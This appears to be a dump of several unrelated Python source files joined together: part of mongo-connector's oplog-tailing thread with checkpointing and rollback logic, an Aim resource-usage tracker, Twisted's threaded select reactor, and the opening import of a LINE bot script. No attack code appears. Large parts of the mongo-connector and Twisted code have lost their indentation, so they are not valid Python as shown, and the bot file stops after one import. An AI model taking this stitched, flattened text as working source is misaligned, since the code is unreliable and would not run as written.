self.primary_client[db][coll], doc
)
docman.insert_file(gridfile, ns, timestamp)
else:
docman.upsert(doc, ns, timestamp)
upsert_inc += 1
# Update
elif operation == "u":
docman.update(
entry["o2"]["_id"], entry["o"], ns, timestamp
)
update_inc += 1
# Command
elif operation == "c":
# use unmapped namespace
doc = entry.get("o")
docman.handle_command(doc, entry["ns"], timestamp)
except errors.OperationFailed:
LOG.exception(
"Unable to process oplog document %r" % entry
)
except errors.ConnectionFailed:
LOG.exception(
"Connection failed while processing oplog "
"document %r" % entry
)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
LOG.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far"
% (remove_inc, upsert_inc, update_inc)
)
LOG.debug("OplogThread: Doc is processed.")
last_ts = entry["ts"]
                        # Update the checkpoint roughly once per batch_size
                        # entries. With the default batch_size of -1,
                        # n % -1 == 0 for every n, so comparing against 1
                        # (rather than 0) leaves per-batch checkpointing off
                        # by default.
if n % self.batch_size == 1:
self.update_checkpoint(last_ts)
last_ts = None
# update timestamp after running through oplog
if last_ts is not None:
LOG.debug(
"OplogThread: updating checkpoint after "
"processing new oplog entries"
)
self.update_checkpoint(last_ts)
except (
pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError,
):
LOG.exception(
"Cursor closed due to an exception. " "Will attempt to reconnect."
)
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
LOG.debug(
"OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread."
)
self.update_checkpoint(last_ts)
LOG.debug(
"OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d" % (remove_inc, upsert_inc, update_inc)
)
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
LOG.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
@classmethod
def _find_field(cls, field, doc):
"""Find the field in the document which matches the given field.
The field may be in dot notation, eg "a.b.c". Returns a list with
a single tuple (path, field_value) or the empty list if the field
is not present.
"""
path = field.split(".")
try:
for key in path:
doc = doc[key]
return [(path, doc)]
except (KeyError, TypeError):
return []
@classmethod
def _find_update_fields(cls, field, doc):
"""Find the fields in the update document which match the given field.
Both the field and the top level keys in the doc may be in dot
notation, eg "a.b.c". Returns a list of tuples (path, field_value) or
the empty list if the field is not present.
"""
def find_partial_matches():
for key in doc:
if len(key) > len(field):
# Handle case where field is a prefix of key, eg field is
# 'a' and key is 'a.b'.
if key.startswith(field) and key[len(field)] == ".":
yield [key], doc[key]
# Continue searching, there may be multiple matches.
# For example, field 'a' should match 'a.b' and 'a.c'.
elif len(key) < len(field):
# Handle case where key is a prefix of field, eg field is
# 'a.b' and key is 'a'.
if field.startswith(key) and field[len(key)] == ".":
# Search for the remaining part of the field
matched = cls._find_field(field[len(key) + 1 :], doc[key])
if matched:
# Add the top level key to the path.
match = matched[0]
match[0].insert(0, key)
yield match
# Stop searching, it's not possible for any other
# keys in the update doc to match this field.
return
try:
return [([field], doc[field])]
except KeyError:
# Field does not exactly match any key in the update doc.
return list(find_partial_matches())
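    # Illustrative example of the matching above: for an update doc
    # {"a.b": 1, "a": {"c": 2}}, the field "a.b" matches the exact top-level
    # key and yields [(["a.b"], 1)], while the field "a.c" matches via the
    # prefix key "a" and yields [(["a", "c"], 2)].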
def _pop_excluded_fields(self, doc, exclude_fields, update=False):
# Remove all the fields that were passed in exclude_fields.
find_fields = self._find_update_fields if update else self._find_field
for field in exclude_fields:
for path, _ in find_fields(field, doc):
# Delete each matching field in the original document.
temp_doc = doc
for p in path[:-1]:
temp_doc = temp_doc[p]
temp_doc.pop(path[-1])
return doc # Need this to be similar to copy_included_fields.
def _copy_included_fields(self, doc, include_fields, update=False):
new_doc = {}
find_fields = self._find_update_fields if update else self._find_field
for field in include_fields:
for path, value in find_fields(field, doc):
# Copy each matching field in the original document.
temp_doc = new_doc
for p in path[:-1]:
temp_doc = temp_doc.setdefault(p, {})
temp_doc[path[-1]] = value
return new_doc
def filter_oplog_entry(self, entry, include_fields=None, exclude_fields=None):
"""Remove fields from an oplog entry that should not be replicated.
NOTE: this does not support array indexing, for example 'a.b.2'"""
if not include_fields and not exclude_fields:
return entry
elif include_fields:
filter_fields = self._copy_included_fields
else:
filter_fields = self._pop_excluded_fields
fields = include_fields or exclude_fields
entry_o = entry["o"]
# Version 3.6 of mongodb includes a $v,
# see https://jira.mongodb.org/browse/SERVER-32240
if "$v" in entry_o:
entry_o.pop("$v")
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry["op"] == "i":
entry["o"] = filter_fields(entry_o, fields)
# 'u' indicates an update. The 'o' field describes an update spec
# if '$set' or '$unset' are present.
elif entry["op"] == "u" and ("$set" in entry_o or "$unset" in entry_o):
if "$set" in entry_o:
entry["o"]["$set"] = filter_fields(entry_o["$set"], fields, update=True)
if "$unset" in entry_o:
entry["o"]["$unset"] = filter_fields(
entry_o["$unset"], fields, update=True
)
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry_o and not entry_o["$set"]:
entry_o.pop("$set")
if "$unset" in entry_o and not entry_o["$unset"]:
entry_o.pop("$unset")
if not entry_o:
return None
# 'u' indicates an update. The 'o' field is the replacement document
# if no '$set' or '$unset' are present.
elif entry["op"] == "u":
entry["o"] = filter_fields(entry_o, fields)
return entry
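    # Illustrative example of the filtering above: for an insert entry
    #   {"op": "i", "ns": "db.coll", "o": {"a": 1, "b": 2}}
    # include_fields=["a"] rewrites entry["o"] to {"a": 1}; for an update entry
    #   {"op": "u", "ns": "db.coll", "o": {"$set": {"a.b": 1, "c": 2}}}
    # exclude_fields=["c"] strips the excluded key, leaving {"$set": {"a.b": 1}}.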
def get_oplog_cursor(self, timestamp=None):
"""Get a cursor to the oplog after the given timestamp, excluding
no-op entries.
If no timestamp is specified, returns a cursor to the entire oplog.
"""
query = {"op": {"$ne": "n"}}
if timestamp is None:
cursor = self.oplog.find(query, cursor_type=CursorType.TAILABLE_AWAIT)
else:
query["ts"] = {"$gte": timestamp}
cursor = self.oplog.find(
query, cursor_type=CursorType.TAILABLE_AWAIT, oplog_replay=True
)
return cursor
def get_collection(self, namespace):
"""Get a pymongo collection from a namespace."""
database, coll = namespace.split(".", 1)
return self.primary_client[database][coll]
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
timestamp = retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
# Flag if this oplog thread was cancelled during the collection dump.
# Use a list to workaround python scoping.
dump_cancelled = [False]
def get_all_ns():
ns_set = []
gridfs_ns_set = []
db_list = self.namespace_config.get_included_databases()
if not db_list:
# Only use listDatabases when the configured databases are not
# explicit.
db_list = retry_until_ok(self.primary_client.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.primary_client[database].collection_names
)
for coll in coll_list:
# ignore system collections
if coll.startswith("system."):
continue
# ignore gridfs chunks collections
if coll.endswith(".chunks"):
continue
if coll.endswith(".files"):
namespace = "%s.%s" % (database, coll)
namespace = namespace[: -len(".files")]
if self.namespace_config.gridfs_namespace(namespace):
gridfs_ns_set.append(namespace)
else:
namespace = "%s.%s" % (database, coll)
if self.namespace_config.map_namespace(namespace):
ns_set.append(namespace)
return ns_set, gridfs_ns_set
dump_set, gridfs_dump_set = get_all_ns()
LOG.debug("OplogThread: Dumping set of collections %s " % dump_set)
def docs_to_dump(from_coll):
last_id = None
attempts = 0
projection = self.namespace_config.projection(from_coll.full_name)
# Loop to handle possible AutoReconnect
while attempts < 60:
if last_id is None:
cursor = retry_until_ok(
from_coll.find,
projection=projection,
sort=[("_id", pymongo.ASCENDING)],
)
else:
cursor = retry_until_ok(
from_coll.find,
{"_id": {"$gt": last_id}},
projection=projection,
sort=[("_id", pymongo.ASCENDING)],
)
try:
for doc in cursor:
if not self.running:
# Thread was joined while performing the
# collection dump.
dump_cancelled[0] = True
                            return  # PEP 479: end the generator instead of raising StopIteration
last_id = doc["_id"]
yield doc
break
except (pymongo.errors.AutoReconnect, pymongo.errors.OperationFailure):
attempts += 1
time.sleep(1)
def upsert_each(dm):
num_failed = 0
for namespace in dump_set:
from_coll = self.get_collection(namespace)
mapped_ns = self.namespace_config.map_namespace(namespace)
total_docs = retry_until_ok(from_coll.count)
num = None
for num, doc in enumerate(docs_to_dump(from_coll)):
try:
dm.upsert(doc, mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception("Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
if num % 10000 == 0:
LOG.info(
"Upserted %d out of approximately %d docs "
"from collection '%s'",
num + 1,
total_docs,
namespace,
)
if num is not None:
LOG.info(
"Upserted %d out of approximately %d docs from "
"collection '%s'",
num + 1,
total_docs,
namespace,
)
if num_failed > 0:
LOG.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
try:
for namespace in dump_set:
from_coll = self.get_collection(namespace)
total_docs = retry_until_ok(from_coll.count)
mapped_ns = self.namespace_config.map_namespace(namespace)
LOG.info(
"Bulk upserting approximately %d docs from " "collection '%s'",
total_docs,
namespace,
)
dm.bulk_upsert(docs_to_dump(from_coll), mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception(
"OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially"
)
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
LOG.debug(
"OplogThread: Using bulk upsert function for " "collection dump"
)
upsert_all(dm)
if gridfs_dump_set:
LOG.info(
"OplogThread: dumping GridFS collections: %s", gridfs_dump_set
)
# Dump GridFS files
for gridfs_ns in gridfs_dump_set:
mongo_coll = self.get_collection(gridfs_ns)
from_coll = self.get_collection(gridfs_ns + ".files")
dest_ns = self.namespace_config.map_namespace(gridfs_ns)
for doc in docs_to_dump(from_coll):
gridfile = GridFSFile(mongo_coll, doc)
dm.insert_file(gridfile, dest_ns, long_ts)
except Exception:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
LOG.critical(
"Exception during collection dump", exc_info=errors.get_nowait()
)
dump_success = False
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
LOG.error("%s %s %s" % (err_msg, effect, self.oplog))
self.running = False
return None
if dump_cancelled[0]:
LOG.warning(
"Initial collection dump was interrupted. "
"Will re-run the collection dump on next startup."
)
return None
return timestamp
def _get_oplog_timestamp(self, newest_entry):
"""Return the timestamp of the latest or earliest entry in the oplog.
"""
sort_order = pymongo.DESCENDING if newest_entry else pymongo.ASCENDING
curr = (
self.oplog.find({"op": {"$ne": "n"}}).sort("$natural", sort_order).limit(-1)
)
try:
ts = next(curr)["ts"]
except StopIteration:
LOG.debug("OplogThread: oplog is empty.")
return None
LOG.debug(
"OplogThread: %s oplog entry has timestamp %s."
% ("Newest" if newest_entry else "Oldest", ts)
)
return ts
def get_oldest_oplog_timestamp(self):
"""Return the timestamp of the oldest entry in the oplog.
"""
return self._get_oplog_timestamp(False)
def get_last_oplog_timestamp(self):
"""Return the timestamp of the newest entry in the oplog.
"""
return self._get_oplog_timestamp(True)
def _cursor_empty(self, cursor):
try:
# Tailable cursors can not have singleBatch=True in MongoDB > 3.3
next(cursor.clone().remove_option(CursorType.TAILABLE_AWAIT).limit(-1))
return False
except StopIteration:
return True
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
Returns the cursor and True if the cursor is empty.
"""
timestamp = self.read_last_checkpoint()
if timestamp is None:
if self.collection_dump:
# dump collection and update checkpoint
timestamp = self.dump_collection()
self.update_checkpoint(timestamp)
if timestamp is None:
return None, True
else:
# Collection dump disabled:
# Return cursor to beginning of oplog but do not set the
# checkpoint. The checkpoint will be set after an operation
# has been applied.
cursor = self.get_oplog_cursor()
return cursor, self._cursor_empty(cursor)
cursor = self.get_oplog_cursor(timestamp)
cursor_empty = self._cursor_empty(cursor)
if cursor_empty:
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from " "get_oplog_cursor")
self.update_checkpoint(self.rollback())
return self.init_cursor()
first_oplog_entry = next(cursor)
oldest_ts_long = util.bson_ts_to_long(self.get_oldest_oplog_timestamp())
checkpoint_ts_long = util.bson_ts_to_long(timestamp)
if checkpoint_ts_long < oldest_ts_long:
# We've fallen behind, the checkpoint has fallen off the oplog
return None, True
cursor_ts_long = util.bson_ts_to_long(first_oplog_entry["ts"])
if cursor_ts_long > checkpoint_ts_long:
# The checkpoint is not present in this oplog and the oplog
# did not rollover. This means that we connected to a new
# primary which did not replicate the checkpoint and which has
# new changes in its oplog for us to process.
# rollback, update checkpoint, and retry
LOG.debug(
"OplogThread: Initiating rollback from "
"get_oplog_cursor: new oplog entries found but "
"checkpoint is not present"
)
self.update_checkpoint(self.rollback())
return self.init_cursor()
# first entry has been consumed
return cursor, cursor_empty
def update_checkpoint(self, checkpoint):
"""Store the current checkpoint in the oplog progress dictionary.
"""
if checkpoint is not None and checkpoint != self.checkpoint:
self.checkpoint = checkpoint
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
# If we have the repr of our oplog collection
# in the dictionary, remove it and replace it
# with our replica set name.
# This allows an easy upgrade path from mongo-connector 2.3.
# For an explanation of the format change, see the comment in
# read_last_checkpoint.
oplog_dict.pop(str(self.oplog), None)
oplog_dict[self.replset_name] = checkpoint
LOG.debug("OplogThread: oplog checkpoint updated to %s", checkpoint)
else:
LOG.debug("OplogThread: no checkpoint to update.")
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
# In versions of mongo-connector 2.3 and before,
# we used the repr of the
# oplog collection as keys in the oplog_progress dictionary.
# In versions thereafter, we use the replica set name. For backwards
# compatibility, we check for both.
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
try:
# New format.
ret_val = oplog_dict[self.replset_name]
except KeyError:
try:
# Old format.
ret_val = oplog_dict[oplog_str]
except KeyError:
pass
LOG.debug("OplogThread: reading last checkpoint as %s " % str(ret_val))
self.checkpoint = ret_val
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
LOG.debug(
"OplogThread: Initiating rollback sequence to bring "
"system into a consistent state."
)
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(
last_docs, key=lambda x: x["_ts"] if x else float("-inf")
)
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc["_ts"])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{"ts": {"$lte": target_ts}, "op": {"$ne": "n"}},
sort=[("$natural", pymongo.DESCENDING)],
)
LOG.debug("OplogThread: last oplog entry is %s" % str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry["ts"]
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc["_ts"]
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc["ns"] in rollback_set:
rollback_set[doc["ns"]].append(doc)
else:
rollback_set[doc["ns"]] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = self.namespace_config.unmap_namespace(namespace)
if not original_namespace:
original_namespace = namespace
database, coll = original_namespace.split(".", 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc["_id"]) for doc in doc_list]
# Use connection to whole cluster if in sharded environment.
client = self.mongos_client or self.primary_client
to_update = util.retry_until_ok(
client[database][coll].find,
{"_id": {"$in": bson_obj_id_list}},
projection=self.namespace_config.projection(original_namespace),
)
# Doc list are docs in target system, to_update are
# Docs in mongo
doc_hash = {} # Hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc["_id"])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc["_id"] in doc_hash:
del doc_hash[doc["_id"]]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
# Delete the inconsistent documents
LOG.debug("OplogThread: Rollback, removing inconsistent " "docs.")
remov_inc = 0
for document_id in doc_hash:
try:
dm.remove(
document_id,
namespace,
util.bson_ts_to_long(rollback_cutoff_ts),
)
remov_inc += 1
LOG.debug("OplogThread: Rollback, removed %r " % doc)
except errors.OperationFailed:
LOG.warning(
"Could not delete document during rollback: %r "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % doc
)
LOG.debug("OplogThread: Rollback, removed %d docs." % remov_inc)
# Insert the ones from mongo
LOG.debug("OplogThread: Rollback, inserting documents " "from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
try:
insert_inc += 1
dm.upsert(
doc, namespace, util.bson_ts_to_long(rollback_cutoff_ts)
)
except errors.OperationFailed:
fail_insert_inc += 1
LOG.exception(
"OplogThread: Rollback, Unable to " "insert %r" % doc
)
LOG.debug(
"OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts))
)
return rollback_cutoff_ts
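
# A standalone sketch of the tailable-cursor pattern that get_oplog_cursor()
# relies on. This is illustrative only (it assumes a replica-set member is
# reachable on localhost) and is not part of mongo-connector's public API:
def _tail_oplog_example(start_ts=None):
    """Open a cursor on the oplog the same way OplogThread does."""
    client = pymongo.MongoClient("localhost", 27017)
    oplog = client.local.oplog.rs
    query = {"op": {"$ne": "n"}}               # skip no-ops, as above
    if start_ts is None:
        return oplog.find(query, cursor_type=CursorType.TAILABLE_AWAIT)
    query["ts"] = {"$gte": start_ts}           # resume from a saved checkpoint
    return oplog.find(
        query, cursor_type=CursorType.TAILABLE_AWAIT, oplog_replay=True
    )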
|
tracker.py
|
from psutil import Process, cpu_percent
from threading import Thread
import time
import weakref
from typing import Union
from aim.ext.resource.stat import Stat
from aim.ext.resource.configs import AIM_RESOURCE_METRIC_PREFIX
class ResourceTracker(object):
STAT_INTERVAL_MIN = 0.1
STAT_INTERVAL_MAX = 24 * 60 * 60.0
STAT_INTERVAL_DEFAULT = 60.0
reset_cpu_cycle = False
@staticmethod
def reset_proc_interval():
"""
Calls process `cpu_percent` which resets cpu utilization tracking cycle
Read more: https://psutil.readthedocs.io/en/latest/#psutil.cpu_percent
"""
cpu_percent(0.0)
def __init__(self, track, interval: Union[int, float] = STAT_INTERVAL_DEFAULT):
self._track_func = weakref.WeakMethod(track)
self.interval = interval
try:
self._process = Process()
except Exception:
self._process = None
# Start thread to collect stats at interval
self._th_collector = Thread(target=self._stat_collector, daemon=True)
self._shutdown = False
self._started = False
if ResourceTracker.reset_cpu_cycle is False:
ResourceTracker.reset_cpu_cycle = True
self.reset_proc_interval()
@property
def interval(self):
return self._interval
@interval.setter
def interval(self, interval: float):
if self.STAT_INTERVAL_MIN <= interval <= self.STAT_INTERVAL_MAX:
self._interval = interval
else:
            raise ValueError(('interval must be between {min} seconds '
                              'and {max} minutes'
                              '').format(min=self.STAT_INTERVAL_MIN,
                                         max=self.STAT_INTERVAL_MAX / 60))
def start(self):
"""
Start statistics collection
"""
if self._started:
return
self._started = True
# Start thread to asynchronously collect statistics
self._th_collector.start()
def stop(self):
if not self._started:
return
self._shutdown = True
self._th_collector.join()
def _track(self, stat: Stat):
# Store system stats
for resource, usage in stat.system.items():
self._track_func()(
usage,
name='{}{}'.format(AIM_RESOURCE_METRIC_PREFIX, resource),
)
# Store GPU stats
for gpu_idx, gpu in enumerate(stat.gpus):
for resource, usage in gpu.items():
self._track_func()(
usage,
name='{}{}'.format(AIM_RESOURCE_METRIC_PREFIX, resource),
context={'gpu': gpu_idx}
)
def _stat_collector(self):
"""
Statistics collecting thread body
"""
while True:
# Get system statistics
stat = Stat(self._process)
if self._shutdown:
break
self._track(stat)
time_counter = 0
while time_counter < self.interval:
time.sleep(0.1)
time_counter += 0.1
if self._shutdown:
break
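
# Minimal usage sketch. _MetricSink is a placeholder consumer standing in for
# whatever bound method the caller passes as `track`; note that it must be a
# *bound method*, because ResourceTracker stores it via weakref.WeakMethod.
def _resource_tracker_example():
    class _MetricSink:
        def track(self, value, name, context=None):
            print(name, value, context)

    sink = _MetricSink()
    tracker = ResourceTracker(track=sink.track, interval=1.0)
    tracker.start()    # spawns the daemon collector thread
    time.sleep(3)      # ... the workload being profiled runs here ...
    tracker.stop()     # flips the shutdown flag and joins the collector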
|
_threadedselect.py
|
# -*- test-case-name: twisted.test.test_internet -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Threaded select reactor
The threadedselectreactor is a specialized reactor for integrating with
arbitrary foreign event loops, such as those you find in GUI toolkits.
There are three things you'll need to do to use this reactor.
Install the reactor at the beginning of your program, before importing
the rest of Twisted::
| from twisted.internet import _threadedselect
| _threadedselect.install()
Interleave this reactor with your foreign event loop, at some point after
your event loop is initialized::
| from twisted.internet import reactor
| reactor.interleave(foreignEventLoopWakerFunction)
| self.addSystemEventTrigger('after', 'shutdown', foreignEventLoopStop)
Instead of shutting down the foreign event loop directly, shut down the
reactor::
| from twisted.internet import reactor
| reactor.stop()
In order for Twisted to do its work in the main thread (the thread that
interleave is called from), a waker function is necessary. The waker function
will be called from a "background" thread with one argument: func.
The waker function's purpose is to call func() from the main thread.
Many GUI toolkits ship with appropriate waker functions.
Some examples of this are wxPython's wx.callAfter (may be wxCallAfter in
older versions of wxPython) or PyObjC's PyObjCTools.AppHelper.callAfter.
These would be used in place of "foreignEventLoopWakerFunction" in the above
example.
The other integration point at which the foreign event loop and this reactor
must integrate is shutdown. In order to ensure clean shutdown of Twisted,
you must allow for Twisted to come to a complete stop before quitting the
application. Typically, you will do this by setting up an after shutdown
trigger to stop your foreign event loop, and call reactor.stop() where you
would normally have initiated the shutdown procedure for the foreign event
loop. Shutdown functions that could be used in place of
"foreignEventloopStop" would be the ExitMainLoop method of the wxApp instance
with wxPython, or the PyObjCTools.AppHelper.stopEventLoop function.
"""
from functools import partial
from threading import Thread
from queue import Queue, Empty
import sys
from zope.interface import implementer
from twisted.internet.interfaces import IReactorFDSet
from twisted.internet import posixbase
from twisted.internet.posixbase import _NO_FILENO, _NO_FILEDESC
from twisted.python import log, failure, threadable
import select
from errno import EINTR, EBADF
from twisted.internet.selectreactor import _select
def dictRemove(dct, value):
try:
del dct[value]
except KeyError:
pass
def raiseException(e):
raise e
@implementer(IReactorFDSet)
class ThreadedSelectReactor(posixbase.PosixReactorBase):
"""A threaded select() based reactor - runs on all POSIX platforms and on
Win32.
"""
def __init__(self):
threadable.init(1)
self.reads = {}
self.writes = {}
self.toThreadQueue = Queue()
self.toMainThread = Queue()
self.workerThread = None
self.mainWaker = None
posixbase.PosixReactorBase.__init__(self)
self.addSystemEventTrigger('after', 'shutdown', self._mainLoopShutdown)
def wakeUp(self):
# we want to wake up from any thread
self.waker.wakeUp()
def callLater(self, *args, **kw):
tple = posixbase.PosixReactorBase.callLater(self, *args, **kw)
self.wakeUp()
return tple
def _sendToMain(self, msg, *args):
self.toMainThread.put((msg, args))
if self.mainWaker is not None:
self.mainWaker()
def _sendToThread(self, fn, *args):
self.toThreadQueue.put((fn, args))
def _preenDescriptorsInThread(self):
log.msg("Malformed file descriptor found. Preening lists.")
readers = self.reads.keys()
writers = self.writes.keys()
self.reads.clear()
self.writes.clear()
for selDict, selList in ((self.reads, readers), (self.writes, writers)):
for selectable in selList:
try:
select.select([selectable], [selectable], [selectable], 0)
except:
log.msg("bad descriptor %s" % selectable)
else:
selDict[selectable] = 1
def _workerInThread(self):
try:
while 1:
fn, args = self.toThreadQueue.get()
fn(*args)
except SystemExit:
pass # Exception indicates this thread should exit
except:
f = failure.Failure()
self._sendToMain('Failure', f)
def _doSelectInThread(self, timeout):
"""Run one iteration of the I/O monitor loop.
This will run all selectables who had input or output readiness
waiting for them.
"""
reads = self.reads
writes = self.writes
while 1:
try:
r, w, ignored = _select(reads.keys(),
writes.keys(),
[], timeout)
break
except ValueError:
# Possibly a file descriptor has gone negative?
log.err()
self._preenDescriptorsInThread()
except TypeError:
# Something *totally* invalid (object w/o fileno, non-integral
# result) was passed
log.err()
self._preenDescriptorsInThread()
except (select.error, IOError) as se:
# select(2) encountered an error
if se.args[0] in (0, 2):
# windows does this if it got an empty list
if (not reads) and (not writes):
return
else:
raise
elif se.args[0] == EINTR:
return
elif se.args[0] == EBADF:
self._preenDescriptorsInThread()
else:
# OK, I really don't know what's going on. Blow up.
raise
self._sendToMain('Notify', r, w)
def _process_Notify(self, r, w):
reads = self.reads
writes = self.writes
_drdw = self._doReadOrWrite
_logrun = log.callWithLogger
for selectables, method, dct in (
(r, "doRead", reads), (w, "doWrite", writes)):
for selectable in selectables:
# if this was disconnected in another thread, kill it.
if selectable not in dct:
continue
                # This is for pausing input when we're not ready for more.
_logrun(selectable, _drdw, selectable, method, dct)
def _process_Failure(self, f):
f.raiseException()
_doIterationInThread = _doSelectInThread
def ensureWorkerThread(self):
        if self.workerThread is None or not self.workerThread.is_alive():
self.workerThread = Thread(target=self._workerInThread)
self.workerThread.start()
def doThreadIteration(self, timeout):
self._sendToThread(self._doIterationInThread, timeout)
self.ensureWorkerThread()
msg, args = self.toMainThread.get()
getattr(self, '_process_' + msg)(*args)
doIteration = doThreadIteration
def _interleave(self):
while self.running:
self.runUntilCurrent()
t2 = self.timeout()
t = self.running and t2
self._sendToThread(self._doIterationInThread, t)
yield None
msg, args = self.toMainThread.get_nowait()
getattr(self, '_process_' + msg)(*args)
def interleave(self, waker, *args, **kw):
"""
interleave(waker) interleaves this reactor with the
current application by moving the blocking parts of
the reactor (select() in this case) to a separate
thread. This is typically useful for integration with
GUI applications which have their own event loop
already running.
See the module docstring for more information.
"""
self.startRunning(*args, **kw)
loop = self._interleave()
def mainWaker(waker=waker, loop=loop):
waker(partial(next, loop))
self.mainWaker = mainWaker
next(loop)
self.ensureWorkerThread()
def _mainLoopShutdown(self):
self.mainWaker = None
if self.workerThread is not None:
self._sendToThread(raiseException, SystemExit)
self.wakeUp()
try:
while 1:
msg, args = self.toMainThread.get_nowait()
except Empty:
pass
self.workerThread.join()
self.workerThread = None
try:
while 1:
fn, args = self.toThreadQueue.get_nowait()
if fn is self._doIterationInThread:
log.msg('Iteration is still in the thread queue!')
elif fn is raiseException and args[0] is SystemExit:
pass
else:
fn(*args)
except Empty:
pass
def _doReadOrWrite(self, selectable, method, dict):
try:
why = getattr(selectable, method)()
handfn = getattr(selectable, 'fileno', None)
if not handfn:
why = _NO_FILENO
elif handfn() == -1:
why = _NO_FILEDESC
except:
why = sys.exc_info()[1]
log.err()
if why:
self._disconnectSelectable(selectable, why, method == "doRead")
def addReader(self, reader):
"""Add a FileDescriptor for notification of data available to read.
"""
self._sendToThread(self.reads.__setitem__, reader, 1)
self.wakeUp()
def addWriter(self, writer):
"""Add a FileDescriptor for notification of data available to write.
"""
self._sendToThread(self.writes.__setitem__, writer, 1)
self.wakeUp()
def removeReader(self, reader):
"""Remove a Selectable for notification of data available to read.
"""
self._sendToThread(dictRemove, self.reads, reader)
def removeWriter(self, writer):
"""Remove a Selectable for notification of data available to write.
"""
self._sendToThread(dictRemove, self.writes, writer)
def removeAll(self):
return self._removeAll(self.reads, self.writes)
def getReaders(self):
return list(self.reads.keys())
def getWriters(self):
return list(self.writes.keys())
def stop(self):
"""
Extend the base stop implementation to also wake up the select thread so
that C{runUntilCurrent} notices the reactor should stop.
"""
posixbase.PosixReactorBase.stop(self)
self.wakeUp()
def run(self, installSignalHandlers=True):
self.startRunning(installSignalHandlers=installSignalHandlers)
self.mainLoop()
def mainLoop(self):
q = Queue()
self.interleave(q.put)
while self.running:
try:
q.get()()
except StopIteration:
break
def install():
"""Configure the twisted mainloop to be run using the select() reactor.
"""
reactor = ThreadedSelectReactor()
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
__all__ = ['install']
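
# A minimal end-to-end sketch of the integration steps described in the module
# docstring, using a plain Queue as the stand-in "foreign event loop". This is
# essentially what ThreadedSelectReactor.mainLoop() does internally and is
# illustrative only; a real GUI toolkit would supply its own waker function.
def _interleave_example():
    reactor = install()                   # 1. install this reactor
    q = Queue()
    reactor.interleave(q.put)             # 2. interleave with the foreign loop
    reactor.callLater(1, reactor.stop)    # 3. stop the reactor, not the loop
    while reactor.running:
        try:
            q.get()()                     # foreign loop executes Twisted's work
        except StopIteration:
            break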
|
bot.py
|
# -*- coding: utf-8 -*-
from linepy import *
